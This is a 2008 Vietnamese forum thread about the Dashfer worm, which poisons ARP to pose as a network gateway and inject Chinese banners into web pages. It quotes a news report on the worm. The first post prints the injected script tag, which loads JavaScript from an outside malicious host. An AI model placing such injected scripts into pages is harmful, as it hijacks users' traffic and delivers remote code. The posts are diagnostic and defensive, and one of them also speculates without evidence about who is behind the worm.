PDA

View Full Version : Virus Dashfer đang bùng phát ở Việt Nam



hrockvn
04-01-2008, 09:56 PM
Đây có lẽ là vụ trả thù của hacker Trung Quốc. Chiều nay, các máy trong Cty tớ có hiện tượng truy cập các website thì bị chèn thêm cái banner của Trung Quốc.
Đây là đoạn script đc thêm vào.

<script src=http://360.gcdws.com/1.js></script>
Nó request đến:
http://360.gcdws.com/html/dg1.html
và 1 trang nữa.

Cách tiêu diệt hông khó. Đơn giản nhất là sài BKAV. Bác Quảng đã phát hiện ra. Theo tớ biết thì Kaspersky chưa diệt đc.


TTO - Sáng 27-12, Trung tâm an ninh mạng BKIS cảnh báo virus W32.Dashfer đang bùng phát tại VN và đã lây nhiễm vào gần 60.000 máy tính. Khi bị nhiễm loại sâu này, người dùng máy tính vào bất kỳ trang web nào đều thấy một banner chữ Trung Quốc hiện lên trên đầu site.
Theo BKIS, virus giả mạo Gateway trên có xuất xứ từ Trung Quốc. Nó bắt đầu lây nhiễm mạnh từ ngày 14-12-2007, tới nay đã có tới 14 biến thể của Dashfer xuất hiện. Nguồn phát tán chủ yếu của virus này là qua các website chứa mã độc hại và qua đĩa USB.
Tại các cơ quan có hệ thống mạng nội bộ, hiện tượng này xảy ra đồng loạt trên tất cả các máy tính trong mạng, khiến cho các quản trị mạng lúng túng, không có cách giải quyết.
"Từ một máy tính nhiễm virus, Dashfer gửi gói tin theo giao thức ARP (giao thức phân giải địa chỉ) tới tất cả các máy tính khác trong cùng mạng để mạo danh là gateway của hệ thống. Các kết nối ra Internet của mọi PC trong mạng lúc này sẽ bị lừa đi qua gateway giả mạo trước rồi mới tới cổng mạng thật.
Bằng cách này, Dashfer sẽ kiểm soát được toàn bộ quá trình trao đổi dữ liệu, chèn thêm banner, popup vào nội dung các trang web trước khi chúng được trả về cho máy tính của người sử dụng", ông Nguyễn Tử Quảng, Giám đốc BKIS, cho biết.
Với phương thức như vậy, không phải máy tính nào xuất hiện banner cũng là bị dính virus vì trong mạng chỉ cần 1 máy nhiễm thì các máy khác vào mạng đều thấy bị chèn banner dù máy đó "sạch virus". Còn PC mà có virus chính là cổng mạng giả.

http://www.tuoitre.com.vn/Tianyon/ImageView.aspx?ThumbnailID=235353
Quá trình chèn banner, popup của virus Dashfer
Ông Quảng khuyến cáo người dung hãy quét virus cho toàn bộ các máy tính trong cơ quan để giải quyết triệt để hiện tượng trên. Trong trường hợp không có điều kiện để quét virus cho tất cả các máy tính, có thể xác định máy tính đang bị nhiễm virus, sau đó diệt trên máy này.
Hiện nay, BKIS đã cập nhật những mẫu virus này vào phiên bản Bkav mới nhất. Nếu gặp những hiện tượng như mô tả trên, bạn có thể tải về phần mềm diệt virus Bkav từ địa chỉ www.bkav.com.vn (http://www.bkav.com.vn/) để xử lý.
http://www.tuoitre.com.vn/Tianyon/Index.aspx?ArticleID=235984&ChannelID=16

vithanhlam
04-01-2008, 10:21 PM
:idea: hay quá mình cũng bị dính cái này chưa biết làm sao , thanks trước nha

Zicky_87
05-01-2008, 02:05 PM
bọn này láo nhờ, đù má nó chứ thảo nào mình thấy web lại có thêm banner của trung quốc, mà source chẳng thấy code đâu